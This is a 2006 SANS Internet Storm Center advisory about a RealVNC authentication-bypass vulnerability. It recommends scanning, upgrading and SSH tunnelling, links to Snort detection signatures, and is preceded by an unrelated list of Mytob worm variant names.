• W32.Mytob.DB@mm
• W32.Mytob.DF@mm
• W32.Mytob.DJ@mm
• W32.Mytob.DL@mm
• W32.Mytob.DP@mm
• W32.Mytob.DV@mm
• W32.Mytob.EB@mm
• W32.Mytob.EC@mm
• W32.Mytob.ED@mm
• W32.Mytob.EE@mm
• W32.Mytob.EG@mm
• W32.Mytob.IE@mm
• W32.Mytob.KE@mm
• W32.Mytob.KP@mm
• W32.Mytob.KU@mm
• W32.Mytob.LE@mm
• W32.Mytob.LO@mm
• W32.Mytob.MC@mm
• W32.Mytob.PI@mm
• W32.Mytob.JI@mm

RealVNC Exploits, Bleeding Snort Signature (NEW)

Published: 2006-05-16,
Last Updated: 2006-05-16 03:44:42 UTC by Kyle Haugsness (Version: 2(click to highlight changes))

Update: Matt Jonkman posted some signatures to bleeding snort that identifies the exploit attempt.  Matt reports good success with these so far.  I'll do some testing with them tomorrow.  http://www.bleedingsnort.com/cgi-bin/viewcvs.cgi/sigs/EXPLOIT/EXPLOIT_RealVNC?view=markup

Given the details of the RealVNC vulnerability that were disclosed this morning (May 15) on Full Disclosure, exploits are now being released.  This note is to alert our readers that the exploit is trivial and very effective.  (In fact, you can modify a VNC client to exploit the vulnerability with very little code changes -- around 1 line.)

Administrators should be scanning their networks for open VNC servers (typically on TCP port 5900).  You want to upgrade any VNC servers that give you protocol above 3.3.  You can use the service detection in nmap to get the protocol number. 

We can't confirm that VNC servers from other projects like TightVNC or UltraVNC are vulnerable - I don't think they are vulnerable.  At this time, it only appears that RealVNC servers are vulnerable.  Unfortunately, there doesn't seem to determine which software the remote end is running.  You only get to see the protocol number.

Unless you like to have unauthorized folks moving your mouse around the screen, you are strongly urged to upgrade to the latest RealVNC release.  Also, you should consider binding the VNC daemon to 127.0.0.1 and tunnelling the VNC traffic through an SSH tunnel, which will provide you with stronger authentication mechanisms.  Google "vnc over ssh" for more detailed instructions on how to accomplish this on your platform of choice.

 

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System.